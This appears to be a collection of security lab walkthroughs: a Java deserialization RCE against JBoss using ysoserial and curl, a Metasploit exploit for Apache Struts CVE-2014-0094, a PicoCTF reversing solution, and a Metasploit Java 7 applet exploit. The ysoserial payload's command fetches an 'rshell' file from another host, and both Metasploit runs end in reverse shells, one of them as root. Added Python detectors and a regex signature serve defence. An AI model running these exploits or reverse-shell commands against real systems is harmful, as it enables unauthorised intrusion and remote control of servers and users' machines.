
# Unserialize RCE vulnerability in Java


Server - 192.168.1.1
# wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download
# unzip jboss-4.2.3.zip
# mv jboss-4.2.3.GA /usr/local/share/jboss
# adduser appserver
# chown -R appserver /usr/local/share/jboss
# su -l appserver
$ cd /usr/local/share/jboss/bin
$ ./run.sh -b 0.0.0.0

Client - 192.168.1.2
# wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar
# java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload
# curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet
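A detection-side check for the request shape used above, added here as an example that is not part of the original post: it flags a request by the Content-Type it declares, by the Java serialization stream header at the start of its body (or its base64 form), and by the JBoss invoker path. The sample requests are constructed.

```python
import base64
import re

# Every Java serialization stream starts with STREAM_MAGIC (0xACED)
# followed by STREAM_VERSION (5).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# The same four bytes once base64-encoded (as seen in cookies / form fields).
JAVA_SERIAL_MAGIC_B64 = base64.b64encode(JAVA_SERIAL_MAGIC)[:5]  # b"rO0AB"


def inspect_request(path, headers, body):
    """Return a list of reasons the request looks like a raw Java object
    being posted to the application; an empty list means nothing found."""
    reasons = []
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    if "application/x-java-serialized-object" in ctype.lower():
        reasons.append("Content-Type declares a Java serialized object")
    if body.startswith(JAVA_SERIAL_MAGIC):
        reasons.append("body begins with serialization magic ac ed 00 05")
    elif JAVA_SERIAL_MAGIC_B64 in body:
        reasons.append("body carries a base64-encoded serialization header (rO0AB)")
    if re.search(r"/invoker/JMXInvokerServlet", path):
        reasons.append("request targets the JBoss JMXInvokerServlet")
    return reasons


# Constructed sample: the shape of the request the walkthrough above sends
# (TC_OBJECT, TC_CLASSDESC and a class name follow the magic).
SUSPICIOUS = (
    "/invoker/JMXInvokerServlet",
    {"Content-Type": "application/x-java-serialized-object; "
                     "class=org.jboss.invocation.MarshalledValue"},
    JAVA_SERIAL_MAGIC + b"sr\x00\x24org.jboss.invocation.MarshalledValue",
)
# Constructed sample: an ordinary JSON request to the same server.
BENIGN = ("/api/items", {"Content-Type": "application/json"}, b'{"id": 1}')

if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, inspect_request(*req))
```

A match on the magic bytes is the most reliable of the three signals, since the Content-Type and the path are both under the sender's control.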

References

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

# CVE-2014-0094: Apache Struts ClassLoader manipulation RCE


Testbed

# wget http://mirrors.ibiblio.org/apache/tomcat/tomcat-8/v8.0.18/bin/apache-tomcat-8.0.18.tar.gz
# tar xvzf apache-tomcat-8.0.18.tar.gz
# mv apache-tomcat-8.0.18 /opt/tomcat
# cat /etc/environment
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
export JAVA_HOME=/usr/lib/jvm/java-7-openjdk-amd64
export CATALINA_HOME=/opt/tomcat
# source /etc/environment
# grep -v -E "^(<\!| |-|$)" /opt/tomcat/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
# $CATALINA_HOME/bin/startup.sh
Using CATALINA_BASE:   /opt/tomcat
Using CATALINA_HOME:   /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME:        /usr/lib/jvm/java-7-openjdk-amd64
Using CLASSPATH:       /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar
Tomcat started.
# wget http://archive.apache.org/dist/struts/binaries/struts-2.3.16-all.zip
# unzip struts-2.3.16-all.zip
# find struts-2.3.16 | grep '\.war'
struts-2.3.16/apps/struts2-portlet.war
struts-2.3.16/apps/struts2-blank.war
struts-2.3.16/apps/struts2-rest-showcase.war
struts-2.3.16/apps/struts2-mailreader.war
struts-2.3.16/apps/struts2-showcase.war
# ! From http://10.0.0.2:8080/manager/html deploy struts2-blank.war
# tail -f /opt/tomcat/logs/*

Exploitation

msf > search cve-2014-0094

Matching Modules
================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   exploit/multi/http/struts_code_exec_classloader  2014-03-06       manual  Apache Struts ClassLoader Manipulation Remote Code Execution

msf > use exploit/multi/http/struts_code_exec_classloader
msf exploit(struts_code_exec_classloader) > set rhost 10.0.0.2
msf exploit(struts_code_exec_classloader) > set lhost 10.0.0.1
msf exploit(struts_code_exec_classloader) > set target 0
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting                           Required  Description
   ----            ---------------                           --------  -----------
   Proxies                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           10.0.0.2                                  yes       The target address
   RPORT           8080                                      yes       The target port
   SMB_DELAY       10                                        yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                                       yes       The local port to listen on.
   STRUTS_VERSION  2.x                                       yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /struts2-blank/example/HelloWorld.action  yes       The path to a struts application action
   VHOST                                                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.1         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(struts_code_exec_classloader) > exploit

[*] Started reverse handler on 10.0.0.1:4444 
[*] 10.0.0.2:8080 - Modifying Class Loader...
[*] 10.0.0.2:8080 - Waiting for the server to flush the logfile
[+] 10.0.0.2:8080 - Log file flushed at http://10.0.0.2:8080/vi8294.jsp
[!] This exploit requires manual cleanup of 'vi8294.jsp' on the target
[*] 10.0.0.2:8080 - Generating JSP...
[*] 10.0.0.2:8080 - Dumping JSP into the logfile...
[*] 10.0.0.2:8080 - Waiting for the server to flush the logfile
[+] 10.0.0.2:8080 - Log file flushed at http://10.0.0.2:8080/vi8294.jsp
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.2:5555)

whoami
root

Defense: payload and signature

GET /struts2-blank/example/HelloWorld.action?
class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT&
class['classLoader'].resources.context.parent.pipeline.first.prefix=0Ucn&
class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp&
class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=4 HTTP/1.1

Signature name = Apache Struts ClassLoader manipulation
part = "class", rgxp = "(.*\.|^|.*|\[('|\"))(c|C)lass(\.|('|\")\]|\[).*"
Search in: Parameters
Protocols: http, https
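The signature above applied to parameter names, as an added example (not code from the original post): the request line from the section is reassembled into one string, its query is percent-decoded the way the framework would see it, and every parameter name matching the regex is returned. Sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The parameter-name signature from the section above, compiled as written.
CLASSLOADER_SIGNATURE = re.compile(r"""(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")\]|\[).*""")


def flag_classloader_params(request_line):
    """Return the decoded query-parameter names of an HTTP request line
    that match the ClassLoader-manipulation signature ([] if none)."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else parts[0]
    query = urlsplit(target).query
    # parse_qsl percent-decodes names, so the check sees what Struts sees
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if CLASSLOADER_SIGNATURE.search(name)]


# Constructed from the request shown above, joined into one request line.
ATTACK_REQUEST = (
    "GET /struts2-blank/example/HelloWorld.action?"
    "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT&"
    "class['classLoader'].resources.context.parent.pipeline.first.prefix=0Ucn&"
    "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp&"
    "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=4 HTTP/1.1"
)
# Constructed benign request: 'class' as a plain substring must not trip the rule.
BENIGN_REQUEST = "GET /struts2-blank/example/HelloWorld.action?name=classic&subclass=1 HTTP/1.1"

if __name__ == "__main__":
    for req in (ATTACK_REQUEST, BENIGN_REQUEST):
        print(flag_classloader_params(req))
```

Matching after decoding matters: the same rule applied to the raw, still-encoded query would miss a percent-encoded `class` prefix.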

References

http://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts
http://www.rapid7.com/db/modules/exploit/multi/http/struts_code_exec_classloader

# PicoCTF 2k13 - Evergreen


$ decompile('HexGame.class')
private long[] serializedState() {
 long s[] = new long[4];
 int bit = 0;
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null) {
    if(hex.team == 0)
     s[(bit + 1) / 64] |= 1L << (bit + 1) % 64;
    else if(hex.team == 1)
      s[bit / 64] |= 1L << bit % 64;
     bit += 2;
   }
  }
 }
 return s;
}
private String stateString() {
 String s = "";
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null)
    if(hex.team == 0)
      s = (new StringBuilder(String.valueOf(s))).append("1").toString();
     else if(hex.team == 1)
      s = (new StringBuilder(String.valueOf(s))).append("2").toString();
     else
      s = (new StringBuilder(String.valueOf(s))).append("0").toString();
  }
 }
 return s;
}
public void update() {
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null && wasCaptured(hex) && hex.team != -1)
    handleCaptured(hex);
  }
 }
 if(justCaptured && !draft.alwaysPlaceAfterCapture)
  justCaptured = rand.nextBoolean();
 if(draft.hasLimitedPieces() && numPieces[currTeam] <= 0)
  justCaptured = false;
 long s[] = serializedState();
 if(s[0] == 0x60a0495842121146L && s[1] == 0x8024120912018061L && s[2] == 0x8824421240220921L && s[3] == 0x1211880604501801L) {
  System.out.println("Success! Your key is on the next line.");
  System.out.println(stateString());
 }
}
$ cat evergreen.py
#!/usr/bin/env python3

def init(num):
    # 64-bit word as a zero-padded binary string, most significant bit first
    return format(num, '064b')

def reverse(pair):
    # Inverse of serializedState(): a team-0 hexagon sets the high bit of
    # its two-bit slot, a team-1 hexagon the low bit; stateString() prints
    # those as '1' and '2' and an empty slot as '0'
    if pair == '10':
        return '1'
    elif pair == '01':
        return '2'
    else:
        return '0'

s0 = init(0x60a0495842121146)
s1 = init(0x8024120912018061)
s2 = init(0x8824421240220921)
s3 = init(0x1211880604501801)

# 256-bit board state; bit 0 of s[0] is the last character of the string
s = s3 + s2 + s1 + s0
l = len(s)
result = ''

# walk the slots from the least significant bit upwards, two bits at a time
for i in range(0, l - 2, 2):
    result += reverse(s[l - 2 - i] + s[l - 1 - i])

print(result)
$ ./evergreen.py
1202202010201002012221020011001220120001200010202100102002100001201021001010000210201002021001012000012000220200120001012020102
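To confirm the recovered key rather than trust the decoder alone, here is the forward direction as an added example (not from the original writeup): serializedState() re-implemented in Python over a stateString() key, so that encoding the decoded key must reproduce the four constants from update().

```python
# The four 64-bit words update() compares against, copied from the decompiled class.
CONSTANTS = (0x60a0495842121146, 0x8024120912018061,
             0x8824421240220921, 0x1211880604501801)


def decode_state(words):
    """Inverse of serializedState(): read two bits per hexagon, from bit 0 up,
    and emit the character stateString() would print for that hexagon."""
    value = 0
    for idx, w in enumerate(words):
        value |= w << (64 * idx)
    chars = []
    for bit in range(0, 254, 2):        # the same 127 slots the solver walks
        pair = (value >> bit) & 0b11
        chars.append({0b10: '1', 0b01: '2'}.get(pair, '0'))
    return ''.join(chars)


def encode_state(state):
    """Forward re-implementation of serializedState() over a stateString()
    key: team 0 sets the high bit of its slot, team 1 the low bit."""
    value = 0
    for idx, ch in enumerate(state):
        bit = 2 * idx
        if ch == '1':
            value |= 1 << (bit + 1)
        elif ch == '2':
            value |= 1 << bit
    mask = (1 << 64) - 1
    return tuple((value >> (64 * k)) & mask for k in range(4))


if __name__ == "__main__":
    key = decode_state(CONSTANTS)
    print(key)
    print("round trip ok:", encode_state(key) == CONSTANTS)
```

The round trip can only succeed because no aligned bit pair in the constants is 11, which is exactly what the game's encoding guarantees (a hexagon belongs to at most one team).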

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>